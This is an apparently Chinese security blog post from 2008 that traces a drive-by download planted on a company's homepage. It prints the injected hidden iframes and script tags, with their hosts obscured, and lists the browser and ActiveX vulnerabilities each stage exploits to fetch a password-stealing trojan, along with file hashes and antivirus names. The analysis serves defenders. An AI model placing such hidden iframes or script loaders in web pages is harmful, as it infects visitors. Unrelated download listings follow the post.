某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg
endurer 原创
2008-02-29 第1版
1.网站首页包含代码:
/---
<iframe src=hxxp://pop**.i**ms**e*e*.cc/g3.htm width=100 height=0></iframe>
---/
1.1 hxxp://pop**.i**ms**e*e*.cc/g3.htm 包含代码:
/---
<iframe src=news.html width=100 height=0></iframe>
---/
1.1.1 hxxp://pop**.i**ms**e*e*.cc/news.html 输出代码:
/---
<script src=hxxp://x**x*x.c**ka**bc*.net/ms06014.js></script>
<iframe style=display:none src="hxxp://x**x*x.c**ka**bc*.net/GLWORLD.html"></iframe>
<iframe style=display:none src="hxxp://x**x*x.c**ka**bc*.net/StormII.html"></iframe>
<sCrIpT LAnGuAgE="jAvAsCrIpT" src=hxxp://x**x*x.c**ka**bc*.net/real.js></script>
<iframe style=display:none src="hxxp://x**x*x.c**ka**bc*.net/Thunder.html"></iframe>
---/
1.1.1.1 hxxp://x**x*x.c**ka**bc*.net/ms06014.js
利用 MS06-014漏洞下载 hxxp://user**1*.1**a2b**3c*0.net/bak.css
bak.css其实是一个PE格式的可执行文件
文件说明符 : D:/test/bak.css
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-29 12:15:9
修改时间 : 2008-2-29 12:15:9
访问时间 : 2008-2-29 12:15:49
大小 : 11504 字节 11.240 KB
MD5 : 17de1eca74664e197a5614762d072b19
SHA1: 56EC3173D9C98552628E3C24688F520B430AC610
CRC32: ee46ca17
Kaspersky 已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.sbg 文件: D:/test/bak.css/PE_Patch/UPack
瑞星报为:Trojan.Win32.Undef.dkp
1.1.1.2 hxxp://x**x*x.c**ka**bc*.net/GLWORLD.html
利用 联众世界的游戏大厅主程序GLWorld所安装的ActiveX控件(HanGamePluginCn18.dll,CLSID:61F5C358-60FB-4A23-A312-D2B556620F20)漏洞下载 hxxp://user**1*.1**a2b**3c*0.net/bak.css
1.1.1.3 hxxp://x**x*x.c**ka**bc*.net/StormII.html
利用 暴风影音2 组件mps.dll(clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB)漏洞下载 hxxp://user**1*.1**a2b**3c*0.net/bak.css
1.1.1.4 hxxp://x**x*x.c**ka**bc*.net/real.js
利用 RealPlayer 漏洞下载 hxxp://user**1*.1**a2b**3c*0.net/bak.css
1.1.1.5 hxxp://x**x*x.c**ka**bc*.net/Thunder.html
内容空白
1.1.1.6 利用 BaiduBar.Tool 下载 hxxp://x**x*x.c**ka**bc*.net/Baidu.cab
Baidu.cab 中的 Baidu.exe 与 bak.css相同。
分享到:
相关推荐
【病毒名称】:Trojan-Downloader.Win32.Generic.a 【病毒类型】:下载者 【危害程度】:中 【传播方式】:网络 【受影响系统】:windows 98以上 病毒行为: 该病毒为下载者木马类,病毒运行后调用API获取系统文件夹...
针对Trojan-Dropper.Win32.Dropkit.a病毒,清除所需要的工具包,包括金山反间谍2007、PowerRmv、sreng2.5
1、Trojan-Ransom.Win32.Rakhni 2、Trojan-Ransom.Win32.Aura 3、Trojan-Ransom.Win32.Agent.iih 4、Trojan-Ransom.Win32.Autoit 5、Trojan-Ransom.AndroidOS.Pletor (安卓下的勒索软件) 6、Trojan-Ransom.Win32....
trojan
2020年trojan最新windows64客户端
RannohDecryptor是卡巴斯基推出的一个Rannoh勒索病毒解密工具,可以解密Rannoh在内的7款勒索软件加密的文件,包括Polyglot、Rannoh、AutoIt、Fury...7、Trojan-Ransom.Win32.CryptXXX (目前能解版本1、版本2,版本3)
Trojan Client
V0.0.4c The Emergency Bug Fix for V0.0.4b V0.0.4b的紧急Bug修复 @TheWanderingCoel TheWanderingCoel released this 3 hours ago This is a version only contain these bug fixes: [Bug Fix] Fix Safari ...
java-trojan-源码.rar
[confluence插件] easymind-3.1.2.jar [confluence插件] easymind-3.1.2.jar [confluence插件] easymind-3.1.2.jar [confluence插件] easymind-3.1.2.jar [confluence插件] easymind-3.1.2.jar ...
trojan-qt5 for linux
trojan-Qt5客户端-windows版本,小巧好用,图形化界面。
trojan-qt5.app.zip
[confluence插件] multiexcerpt-conf-plugin-4-5.6.30 [confluence插件] multiexcerpt-conf-plugin-4-5.6.30 [confluence插件] multiexcerpt-conf-plugin-4-5.6.30 [confluence插件] multiexcerpt-conf-plugin-4-5.6...
[confluence插件] treecopy-2.6.51.obr [confluence插件] treecopy-2.6.51.obr [confluence插件] treecopy-2.6.51.obr [confluence插件] treecopy-2.6.51.obr [confluence插件] treecopy-2.6.51.obr ...
[confluence插件] git-plugin-2.12.15 [confluence插件] git-plugin-2.12.15 [confluence插件] git-plugin-2.12.15 [confluence插件] git-plugin-2.12.15 [confluence插件] git-plugin-2.12.15[confluence插件] git-...
[confluence插件] gliffy-confluence-plugin-9.7.4.obr [confluence插件] gliffy-confluence-plugin-9.7.4.obr [confluence插件] gliffy-confluence-plugin-9.7.4.obr [confluence插件] gliffy-confluence-plugin-...
[confluence插件] confluence-markdown-macro-1.6.22.jar [confluence插件] confluence-markdown-macro-1.6.22.jar [confluence插件] confluence-markdown-macro-1.6.22.jar [confluence插件] confluence-markdown-...
[confluence插件] custom-charts-server-5.2.12.obr [confluence插件] custom-charts-server-5.2.12.obr [confluence插件] custom-charts-server-5.2.12.obr [confluence插件] custom-charts-server-5.2.12.obr ...